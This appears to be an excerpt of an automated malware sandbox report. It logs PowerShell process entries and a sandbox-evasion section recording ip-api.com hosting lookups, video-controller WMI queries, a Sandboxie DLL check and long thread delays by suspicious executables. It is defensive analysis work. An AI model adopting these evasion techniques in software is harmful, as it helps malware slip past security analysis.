                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: C:\Users\user\adawsfaefasfasfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\adawsfaefasfasfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\wasdwasfwasfs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\wasdwasfwasfs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.drBinary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeMemory allocated: 1AD00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeMemory allocated: 1B080000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeMemory allocated: 1AEA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Systen UserMemory allocated: 1830000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Systen UserMemory allocated: 1B1B0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599870Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599761Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599656Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599546Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599436Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599148Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 599030Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598922Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598812Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598703Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598593Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598484Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598375Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598265Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 598047Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597922Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597811Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597703Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597593Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597484Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597374Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597265Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597152Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 597046Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596933Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596827Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596718Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596580Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596460Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596344Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596219Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 596108Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595999Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595880Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595750Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595637Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595530Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595421Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595312Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595203Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 595093Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594984Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594874Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594752Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594619Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594464Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594334Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594203Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeThread delayed: delay time: 594093Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599873Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599765Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599655Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599547Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599422Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599280Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599170Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 599062Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598953Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598844Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598734Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598625Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598515Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598402Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598281Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598172Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 598062Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597943Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597812Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597703Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597594Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597469Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597359Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597250Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597140Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 597031Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596907Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596781Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596672Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596562Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596447Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596328Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596219Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596109Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 596000Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595890Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595765Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595655Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595547Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595437Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595328Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595219Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 595094Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594984Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594867Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594750Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594609Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594314Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594200Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 594078Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeThread delayed: delay time: 593968Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Systen UserThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\adawsfaefasfasfg.exeWindow / User API: threadDelayed 7256Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeWindow / User API: threadDelayed 2559Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeWindow / User API: threadDelayed 3501Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeWindow / User API: threadDelayed 6323Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8641Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 885Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8525
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1049
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5767
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1385
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6258
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1117
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7545
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1648
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7559
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1982
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep count: 39 > 30Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3820Thread sleep count: 7256 > 30Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599870s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599761s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3820Thread sleep count: 2559 > 30Jump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599656s >= -30000sJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104Thread sleep time: -599546s >= -30000sJump to behavior
